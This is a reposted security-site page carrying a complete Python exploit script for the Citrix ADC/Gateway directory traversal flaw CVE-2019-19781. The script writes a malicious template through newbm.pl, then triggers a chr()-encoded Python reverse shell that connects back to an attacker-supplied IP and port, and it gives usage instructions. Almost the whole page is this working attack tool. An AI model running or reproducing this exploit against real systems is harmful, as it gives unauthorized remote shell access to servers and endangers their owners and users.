HackDig : Dig high-quality web security articles for hackers

Citrix Application Delivery Controller and Citrix Gateway Remote Code Execution

2020-01-12 11:10
#!/usr/bin/python3## Exploits the Citrix Directory Traversal Bug: CVE-2019-19781## You only need a listener like netcat to catch the shell.## Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White## Tool Written by: Rob Simon and David Kennedyimport requestsimport urllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warningsimport randomimport stringimport timefrom random import randintimport argparseimport sys# random string generatordef randomString(stringLength=10):    letters = string.ascii_lowercase    return ''.join(random.choice(letters) for i in range(stringLength))# our random string for filename - will leave artifacts on systemfilename = randomString()randomuser = randomString()# generate random number for the noncenonce = randint(5, 15) # this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script# note that the file location will be in /netscaler/portal/templates/filename.xmldef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):    # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)    encoded = ""    i=0    text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport))    while i < len(text):        encoded = encoded + "chr("+str(ord(text[i]))+") . "        i += 1    encoded = encoded[:-3]    payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]"    headers = (         {            'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',            'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),            'NSC_NONCE' : '%s' % (nonce),        })    data = (        {            "url" : "127.0.0.1",            "title" : payload,            "desc" : "desc",            "UI_inuse" : "a"        })    url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))    requests.post(url, data=data, headers=headers, verify=False)# this is our second stage that triggers the exploit for usdef stage2(filename, randomuser, nonce, victimip, victimport):    headers = (        {            'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',            'NSC_USER' : '%s' % (randomuser),            'NSC_NONCE' : '%s' % (nonce),        })    requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False)# start our main code to executeprint('''  .o oOOOOOOOo                                            OOOo    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':                      `$"  `OOOO' `O"Y ' `OOOO'  o             .    .                  .     OP"          : o     .                              :Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781Tool Written by: Rob Simon and Dave KennedyContributions: The TrustedSec Team Website: https://www.trustedsec.comINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is usedto append files in an XML format to the victim machine. This in turn allows for remote code execution.Be sure to cleanup these two file locations:    /var/tmp/netscaler/portal/templates/    /netscaler/portal/templates/Usage:python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>n''')# parse our commandsparser = argparse.ArgumentParser()parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")parser.add_argument("targetport", help="the target server web port (normally on 443)")parser.add_argument("attackerip", help="the attackers reverse listener IP address")parser.add_argument("attackerport", help="the attackersa reverse listener port")args = parser.parse_args()print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...")print("[*] Saving filename as %s.xml on the victim machine..." % (filename))# trigger our first poststage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)print("[*] Sleeping for 2 seconds to ensure file is written before we call it...")time.sleep(2)print("[*] Triggering GET request for the newly created file with a listener waiting...")print("[*] Shell should now be in your listener... enjoy. Keep this window open..")print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/")# trigger our second poststage2(filename, randomuser, nonce, args.target, args.targetport)


Source: 3900100202-BLW/eussi/moc.ytirucesxc

Read:881 | Comments:0 | Tags:No Tag

“Citrix Application Delivery Controller and Citrix Gateway Remote Code Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools